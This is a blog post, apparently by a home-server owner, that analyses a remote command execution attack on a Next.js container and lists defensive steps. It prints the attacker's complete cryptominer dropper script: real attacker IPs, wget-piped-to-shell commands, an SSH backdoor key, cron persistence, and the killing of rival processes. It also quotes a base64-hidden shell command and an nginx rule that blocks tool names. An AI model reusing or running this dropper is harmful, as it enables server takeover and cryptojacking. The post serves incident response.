Strange logs were piling up on my home server, so I took a look,
and the following command kept showing up.

```text
⨯ [Error: spawnSync /bin/sh ENOBUFS] {
  errno: -105,
  code: 'ENOBUFS',
  syscall: 'spawnSync /bin/sh',
  path: '/bin/sh',
  spawnargs: [ c', -q http://221.156.167.200:9090/js/grepb32.txt -O- |sh'
```

Searching around, this is called a Remote Command Execution (RCE) attack:
it downloads a script from the attacker's server and runs it.
When I opened the text file at that address, it contained the files shown below.

[Full code]
```text
[Error: EROFS: read-only file system, open '/var/tmp/6h7hvj9t.sh'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/var/tmp/6h7hvj9t.sh',
digest: '2109192527'
}
⨯ [Error: EROFS: read-only file system, open '/root/22kqkrpt'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/22kqkrpt',
digest: '4116131628'
}
⨯ [Error: EROFS: read-only file system, open '/root/l8zl7wxs'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/l8zl7wxs',
digest: '2944710764'
}
⨯ [Error: EROFS: read-only file system, open '/var/tmp/8t5mxky6.sh'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/var/tmp/8t5mxky6.sh',
digest: '2260870223'
}
⨯ [Error: EROFS: read-only file system, open '/root/88iimn8w'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/88iimn8w',
digest: '767570156'
}
⨯ [Error: EROFS: read-only file system, open '/var/tmp/gapn1jj2.sh'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/var/tmp/gapn1jj2.sh',
digest: '431724239'
}
⨯ [Error: EROFS: read-only file system, open '/root/53y3on8u'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/53y3on8u',
digest: '1419670508'
}
⨯ [Error: EROFS: read-only file system, open '/root/au52nov7'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/au52nov7',
digest: '2765509932'
}
⨯ [Error: EROFS: read-only file system, open '/var/tmp/au7hqf5f.sh'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/var/tmp/au7hqf5f.sh',
digest: '2021416143'
}
⨯ [Error: EROFS: read-only file system, open '/var/tmp/47x8j3eh.sh'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/var/tmp/47x8j3eh.sh',
digest: '2517699087'
}
⨯ [Error: EROFS: read-only file system, open '/root/1xj4ekku'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/1xj4ekku',
digest: '1013930604'
}
⨯ [Error: EROFS: read-only file system, open '/root/tl5qowmu'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/tl5qowmu',
digest: '3454751980'
}
⨯ [Error: EROFS: read-only file system, open '/var/tmp/h4g61pzw.sh'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/var/tmp/h4g61pzw.sh',
digest: '2688838863'
}
⨯ [Error: EROFS: read-only file system, open '/root/7rgoezr0'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/7rgoezr0',
digest: '3175021420'
}
⨯ [Error: EROFS: read-only file system, open '/var/tmp/8ziwuikb.sh'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/var/tmp/8ziwuikb.sh',
digest: '837302799'
}
⨯ [Error: EROFS: read-only file system, open '/root/uf7wkl4h'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/uf7wkl4h',
digest: '4176701036'
}
⨯ [Error: EROFS: read-only file system, open '/root/qsz3n8e9'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/qsz3n8e9',
digest: '2141452716'
}
⨯ [Error: EROFS: read-only file system, open '/var/tmp/20rx0rhe.sh'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/var/tmp/20rx0rhe.sh',
digest: '925503695'
}
⨯ [Error: EROFS: read-only file system, open '/root/bcjb9ur4'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/bcjb9ur4',
digest: '1738845292'
}
⨯ [Error: EROFS: read-only file system, open '/var/tmp/gozruvlc.sh'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/var/tmp/gozruvlc.sh',
digest: '1755801167'
}
⨯ [Error: EROFS: read-only file system, open '/root/f354hj5n'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/f354hj5n',
digest: '1570082732'
}
⨯ [Error: EROFS: read-only file system, open '/root/sizqus5k'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/sizqus5k',
digest: '2721348588'
}
npm notice
npm notice New major version of npm available! 10.9.4 -> 11.13.0
npm notice Changelog: https://github.com/npm/cli/releases/tag/v11.13.0
npm notice To update run: npm install -g npm@11.13.0
npm notice
> --yjw7003-next@0.1.0 start
> next start -p 3000
▲ Next.js 15.3.2
- Local: http://localhost:3000
- Network: http://172.19.0.5:3000
✓ Starting...
✓ Ready in 161ms
⨯ [Error: EROFS: read-only file system, open '/var/tmp/4xevfe5x.sh'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/var/tmp/4xevfe5x.sh',
digest: '2054842831'
}
⨯ [Error: EROFS: read-only file system, open '/root/kst96ws7'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/kst96ws7',
digest: '338522604'
}
⨯ [Error: Command failed: pkill -f sh ] {
status: 1,
signal: null,
output: [Array],
pid: 32,
stdout: <Buffer >,
stderr: <Buffer >,
digest: '1571803207'
}
kill: can't kill pid 39: No such process
⨯ [Error: Command failed: echo cHMgYXV4IHwgZ3JlcCAtdiAnZ3JlcFx8c2VydmVyLmpzXHwvdG1wLy5YSU4tdW5peC9qYXZhZVx8bmV4dC1zZXJ2ZXJcfGVudHJ5cG9pbnQuc2hcfG5wbVx8c3RhcnQuc2hcfG5vZGVcfGJ1blx8c3RhcnR1cC5zaFx8TWFpblRocmVhZFx8TWVtXHxDUFVcfExvYWRcfFxbXHxwcyBhdXhcfFBJRCcgfCBhd2sgJ3twcmludCAkMX0nIHwgeGFyZ3MgLUkgJSBraWxsIC05ICUK |base64 -d |sh
kill: can't kill pid 39: No such process
] {
status: null,
signal: 'SIGKILL',
output: [Array],
pid: 33,
stdout: <Buffer >,
stderr: <Buffer 6b 69 6c 6c 3a 20 63 61 6e 27 74 20 6b 69 6c 6c 20 70 69 64 20 33 39 3a 20 4e 6f 20 73 75 63 68 20 70 72 6f 63 65 73 73 0a>,
digest: '2320609031'
}
rm: can't remove '.' or '..'
rm: can't remove '.' or '..'
rm: '/tmp/node-compile-cache' is a directory
chmod: /var/tmp/.bin: No such file or directory
touch: /var/tmp/.bin: Read-only file system
mkdir: can't create directory '/dev/shm/duet/app': No such file or directory
mkdir: can't create directory '/home/opc/.acme.sh': No such file or directory
sh: can't create /root/.bashrc: Read-only file system
sh: can't create /root/.bash_profile: Read-only file system
chmod: /root/.bash_history: No such file or directory
chattr: can't stat '/root/.bash_history': No such file or directory
sh: can't create /root/.profile: Read-only file system
mkdir: can't create directory '/root/.ssh': Read-only file system
sh: can't create /root/.ssh/authorized_keys: nonexistent directory
chmod: /root/.ssh/authorized_keys: No such file or directory
kill: you need to specify whom to kill
kill: you need to specify whom to kill
kill: you need to specify whom to kill
kill: you need to specify whom to kill
kill: you need to specify whom to kill
kill: you need to specify whom to kill
crontab: can't append to /var/spool/cron/crontabs/cron.update
crontab: can't create /var/spool/cron/crontabs/root.new
crontab: can't append to /var/spool/cron/crontabs/cron.update
rm: can't remove '.' or '..'
rm: can't remove '.' or '..'
ls: /proc/188: No such file or directory
ls: /proc/189: No such file or directory
ls: /proc/190: No such file or directory
ls: /proc/36/cwd: cannot read link: No such file or directory
ls: /proc/36/exe: cannot read link: No such file or directory
ls: /proc/36/root: cannot read link: No such file or directory
ls: /proc/40/cwd: cannot read link: No such file or directory
ls: /proc/40/exe: cannot read link: No such file or directory
ls: /proc/40/root: cannot read link: No such file or directory
ls: /proc/44/cwd: cannot read link: No such file or directory
ls: /proc/44/exe: cannot read link: No such file or directory
ls: /proc/44/root: cannot read link: No such file or directory
kill: invalid number 'USER'
chmod: /tmp/.ICEi-unix/*: No such file or directory
⨯ [Error: x] { digest: 'Q3JvbiBub3QgZm91bmQK' }
```
```text
wget: can't open '/var/tmp/grep.tar.gz': Read-only file system
tar: can't open '/var/tmp/grep.tar.gz': No such file or directory
rm: can't remove '.' or '..'
rm: can't remove '.' or '..'
mv: can't rename '/var/tmp/xmrig-6.24.0': Read-only file system
mv: can't rename '/var/tmp/.unix/xmrig': No such file or directory
sh: can't create /var/tmp/.unix/config.json: nonexistent directory
⨯ [Error: x] { digest: '3257531580' }
```
```text
⨯ [Error: EROFS: read-only file system, open '/root/1w1onm6y'] {
errno: -30,
code: 'EROFS',
syscall: 'open',
path: '/root/1w1onm6y',
digest: '1554842604'
}
cat: can't open '/tmp/.XIN-unix/config.json': No such file or directory
⨯ [Error: Command failed: cat /tmp/.XIN-unix/config.json |grep user
cat: can't open '/tmp/.XIN-unix/config.json': No such file or directory
] {
status: 1,
signal: null,
output: [Array],
pid: 7635,
stdout: <Buffer >,
stderr: <Buffer 63 61 74 3a 20 63 61 6e 27 74 20 6f 70 65 6e 20 27 2f 74 6d 70 2f 2e 58 49 4e 2d 75 6e 69 78 2f 63 6f 6e 66 69 67 2e 6a 73 6f 6e 27 3a 20 4e 6f 20 73 ... 22 more bytes>,
digest: '3134927815'
}
```
```sh
#!/bin/sh
# Stage 1: wipe the usual temp locations and kill competing miners or
# earlier infections (the "kill" and "rm" errors in the log come from here)
rm -f /tmp/.*
rm -f /tmp/*
pkill -f http://185.216.75.152
rm -f /dev/shm/*
rm -rf /var/tmp/*
rm -rf xmrig-6.24.0
rm -rf /app/web/xmrig*
rm -f /app/web/.log
ps aux | grep -v grep | grep 'ldr.sh' | awk '{print $1}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'xmrig\|kworker_ds' | awk '{print $1}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep '/app/web/guard.js' | awk '{print $1}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kdevtmpfsi\|auto.c3pool' | awk '{print $1}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'sh -s kthreaddo' | awk '{print $1}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'node /var/tmp/\|node /tmp/' | awk '{print $1}' | xargs -I % kill -9 %
rm -rf ~/moneroocean
pkill -9 -f mysqldd
pkill -9 -f monero
pkill -9 -f kinsing
pkill -9 -f sshpass
pkill -9 -f sshexec
pkill -9 -f attack
pkill -9 -f dovecat
pkill JavaUpdate
pkill SSHD2
pkill -f /var/tmp/.bin
chmod +w /var/tmp/.bin
touch /var/tmp/.bin
pkill mysqlserver
pkill gitlab-redis
pkill ksoftriqd
pkill -9 -f donate
pkill -9 -f xmr-stak
pkill -9 -f crond64
pkill -9 -f stratum
pkill -9 -f /tmp/java
pkill -9 -f pastebin
pkill -9 -f /tmp/system
pkill -9 -f excludefile
pkill -9 -f agettyd
pkill -9 -f /var/tmp
pkill -9 pnscan
rm -f /dev/shm/duet/app
mkdir /dev/shm/duet/app
rm -rf /home/opc/.acme.sh
mkdir /home/opc/.acme.sh
pkill -9 masscan
pkill -9 kthreaddi
pkill -9 sysguard
pkill -9 kthreaddk
pkill -9 kdevtmpfsi
pkill -9 networkservice
pkill -9 sysupdate
pkill -9 phpguard
pkill -9 phpupdate
pkill -9 networkmanager
pkill -9 knthread
pkill -9 mysqlserver
pkill -9 watchbog
pkill -9 xmrig
pkill -9 -f /dev/shm
pkill -9 bashirc
# Stage 2: blank the shell profiles, lock shell history, and drop the
# attacker's SSH public key (the "can't create /root/.ssh/..." errors)
echo >~/.bashrc
echo >~/.bash_profile
chmod -w ~/.bash_history
chattr +i ~/.bash_history
echo >~/.profile
mkdir ~/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCcczUbb3KWRPOdPrZECTFvOnRmOYoq/EOcr34XcTBq2XkRAKa6W9XNuL+ewWp8uBLPLUtH9zpt54OQI1ebBDe+BOZYHRrfCshsQ75moWA/TjO5S7IalrBGeUpXPOYlyDyAfhjy/5dG0EGA+oO3Sui+38CDT4dnQ8TqVZZNFElrwYDHHtrzZOji7iMW0LuFDE/hkk2C5hLKD5BxmzCFZUi7BQXSgcCCwqTNe0V0QxnEbyjmePrgNVni6MOMqw+XmfDZamtmcr0MZUvlVDDnAMU59opdG4JP71S0IYozYBbXylBsHZ+s2bSdjZYTZbT0/oQZlpX2duAnYn9Ant3qLKQ9 beaj">>~/.ssh/authorized_keys
chmod -w ~/.ssh/authorized_keys
# Kill anything bound to well-known mining-pool and rival-miner ports
pgrep pbotbyjanhotzu | xargs -I % kill -9 %
netstat -antp | grep ':10032' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':5555' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':33331' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':13333' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':17777' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
netstat -antp | grep ':3333' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
pkill kinsing
pkill -9 zgrab
# Stage 3: persistence. Replace the whole crontab with a job that re-fetches
# the loader every 5 minutes (the "Cron not found" digest in the log is this echo)
url="https://pastebin.com/raw/1E9cGF4W"
if crontab -l | grep -q "$url"
then
echo "Cron exists"
else
crontab -r
echo "Cron not found"
echo "*/5 * * * * wget -q https://pastebin.com/raw/1E9cGF4W -O- |sh > /dev/null 2>&1" | crontab -
fi
# Stage 4: if the miner ("javae") is not running, kill rival miners found via
# /proc, then fetch the miner config, binary and a helper script and start them
ps -fe | grep javae | grep -v 'grep\|\['; if [ $? -ne 0 ]; then
rm -rf /tmp/.*
rm -rf /tmp/*
rm -rf /var/tmp/*
for i in $(ls /proc|grep '[0-9]'); do
if ls -al /proc/$i 2>/dev/null|grep javae 2>/dev/null; then
continue
fi
if grep -a 'donate-level' /proc/$i/exe 1>/dev/null 2>&1; then
kill -9 $i
fi
if ls -al /proc/$i | grep exe | grep "/var/tmp\|/tmp\|/dev/shm\|deleted"; then
kill -9 $i
fi
done
pkill -f /tmp/.ICEi-unix/javae
# kill whatever ps reports at >= 70 in column 3 (rival CPU hogs)
ps auxf|grep -v grep | awk '{if($3>=70.0) print $2}'| xargs kill -9
mkdir /tmp/.ICEi-unix
chmod +xwr /tmp/.ICEi-unix
chmod +xwr /tmp/.ICEi-unix/*
TMNAME=$(head -3 /dev/urandom | tr -cd '[:alnum:]' | cut -c -6)
wget -q http://221.156.167.200:9090/js/grep.json -O /tmp/.ICEi-unix/config.json
wget -q http://221.156.167.200:9090/js/grep.rar -O /tmp/.ICEi-unix/javae
wget -q http://221.156.167.200:9090/js/grep00.sh -O /tmp/$TMNAME
chmod +x /tmp/.ICEi-unix/javae
cd /tmp
nohup sh $TMNAME >/dev/null 2>&1 &
nohup /tmp/.ICEi-unix/javae >/dev/null 2>&1 &
sleep 10
rm -f /tmp/*
else
echo "running"
fi
rm -f /tmp/*
```
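As an added example (not code from the original post or from the attacker's script), a small triage pass over a container log of this shape: it flags the indicators seen in the dump above, recovers the paths the dropper tried to write, and decodes the base64-wrapped command so a responder can read it. The sample lines are constructed from the log; ATTACKER_HOST is a placeholder.

```javascript
// Added example, not from the original post: triage of a Node.js container log
// for the indicators visible in the dump above. SAMPLE_LOG is constructed from
// the post's log with the attacker's host replaced by the placeholder ATTACKER_HOST.
const INDICATORS = [
  // "wget -q http://... -O- |sh": a remote script piped straight into a shell
  { tag: 'remote-script-to-shell', re: /\b(?:wget|curl)\b.*\|\s*sh\b/ },
  // "echo <b64> |base64 -d |sh": a command hidden behind base64 encoding
  { tag: 'base64-to-shell', re: /echo\s+[A-Za-z0-9+/=]{16,}\s*\|\s*base64\s+-d\s*\|\s*sh\b/ },
  // a shell spawned from inside the application process (child_process)
  { tag: 'shell-spawned-by-app', re: /spawnSync \/bin\/sh/ },
  // the dropper could not write: the read-only root filesystem held
  { tag: 'write-blocked-by-ro-fs', re: /EROFS: read-only file system, open '[^']+'/ },
  { tag: 'cron-persistence-attempt', re: /\bcrontab\b/ },
  { tag: 'ssh-key-drop-attempt', re: /authorized_keys/ },
  { tag: 'miner-artifact', re: /xmrig|donate-level|stratum/i },
];

// Classify one line: which indicators fire, which path a blocked write targeted,
// and the plaintext of any base64-wrapped command.
function classifyLine(line) {
  const result = { tags: INDICATORS.filter((i) => i.re.test(line)).map((i) => i.tag) };
  const blocked = line.match(/EROFS: read-only file system, open '([^']+)'/);
  if (blocked) result.blockedPath = blocked[1];
  const b64 = line.match(/echo\s+([A-Za-z0-9+/=]{16,})\s*\|\s*base64\s+-d/);
  if (b64) result.decoded = Buffer.from(b64[1], 'base64').toString('utf8');
  return result;
}

// Aggregate a whole log: per-indicator counts, the paths the dropper tried to
// write, decoded commands, and two verdicts: did code execution happen, and
// did the read-only filesystem keep the payload off disk.
function triage(logText) {
  const summary = { counts: {}, blockedPaths: [], decoded: [] };
  for (const line of logText.split('\n')) {
    const r = classifyLine(line);
    for (const t of r.tags) summary.counts[t] = (summary.counts[t] || 0) + 1;
    if (r.blockedPath) summary.blockedPaths.push(r.blockedPath);
    if (r.decoded) summary.decoded.push(r.decoded);
  }
  summary.codeExecuted = Boolean(summary.counts['shell-spawned-by-app']
    && summary.counts['remote-script-to-shell']);
  summary.writesBlocked = (summary.counts['write-blocked-by-ro-fs'] || 0) > 0;
  return summary;
}

// Constructed sample: a shortened version of the log shown above.
const SAMPLE_LOG = [
  "⨯ [Error: spawnSync /bin/sh ENOBUFS] { errno: -105, code: 'ENOBUFS', spawnargs: [ '-c', 'wget -q http://ATTACKER_HOST:9090/js/grepb32.txt -O- |sh' ] }",
  "⨯ [Error: EROFS: read-only file system, open '/var/tmp/6h7hvj9t.sh'] {",
  "⨯ [Error: EROFS: read-only file system, open '/root/22kqkrpt'] {",
  // base64 of "ps aux | grep -v grep", constructed for this example
  '⨯ [Error: Command failed: echo cHMgYXV4IHwgZ3JlcCAtdiBncmVw |base64 -d |sh',
  "crontab: can't create /var/spool/cron/crontabs/root.new",
  "sh: can't create /root/.ssh/authorized_keys: nonexistent directory",
  "mv: can't rename '/var/tmp/xmrig-6.24.0': Read-only file system",
  '✓ Ready in 161ms',
].join('\n');

console.log(JSON.stringify(triage(SAMPLE_LOG), null, 2));
```

Pointed at the real container log (for example `docker logs <container> | node triage.js`, adapted to read stdin), the same functions give the per-indicator counts and the decoded commands directly.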
Actions taken

1. nginx: return 403 on wget requests

```nginx
if ($request_uri ~* "(wget|curl|bash|sh|nc|perl|python)") {
    return 403;
}
```
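An added example, not from the original post, that runs the rule above against sample request URIs to show where it fires: nginx's `~*` is an unanchored, case-insensitive regex match, so the bare `sh` and `nc` alternatives also match ordinary application paths. The word-bounded TIGHTER_RULE, the sample URIs and the ATTACKER_HOST placeholder are constructed here.

```javascript
// Added example, not from the original post: the post's nginx $request_uri rule
// beside a word-bounded variant (constructed), checked against sample paths.
const POST_RULE = /(wget|curl|bash|sh|nc|perl|python)/i;        // the rule in the post
const TIGHTER_RULE = /\b(wget|curl|bash|sh|nc|perl|python)\b/i; // constructed alternative

// Emulates `if ($request_uri ~* "...") { return 403; }` for one request URI.
function decide(rule, uri) {
  return rule.test(uri) ? 403 : 200;
}

// Run both rules over a list of URIs and report the status each would return.
function compare(uris) {
  return uris.map((uri) => ({
    uri,
    post: decide(POST_RULE, uri),
    tighter: decide(TIGHTER_RULE, uri),
  }));
}

// Legitimate paths from the list that a rule would wrongly block.
function falsePositives(rule, legitimateUris) {
  return legitimateUris.filter((uri) => decide(rule, uri) === 403);
}

// Constructed sample: real-looking app routes plus two probes of the kind the
// rule is meant to stop (ATTACKER_HOST is a placeholder).
const LEGITIMATE = [
  '/dashboard',       // contains "sh"
  '/announcements',   // contains "nc"
  '/api/python-jobs', // names a tool as a whole route segment
];
const PROBES = ['/?cmd=wget%20http://ATTACKER_HOST/x.sh', '/cgi-bin/test.sh'];

console.table(compare([...LEGITIMATE, ...PROBES]));
console.log('false positives, post rule:   ', falsePositives(POST_RULE, LEGITIMATE));
console.log('false positives, tighter rule:', falsePositives(TIGHTER_RULE, LEGITIMATE));
```

Word boundaries remove the `/dashboard` and `/announcements` false positives but still block `/api/python-jobs`, so a substring rule like this is best limited to paths the application does not serve; it also only sees the request line, not the request body.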
2. Add a WAF
Apply the WAF that CloudFlare provides.
Command to check whether the NS records have been switched over:
`nslookup -type=ns yourdomain.com`

3. Block IPs that are not from Korea


4. Add monitoring that detects changes to scripts

5. Detect and block bots

6. Set up Fail2ban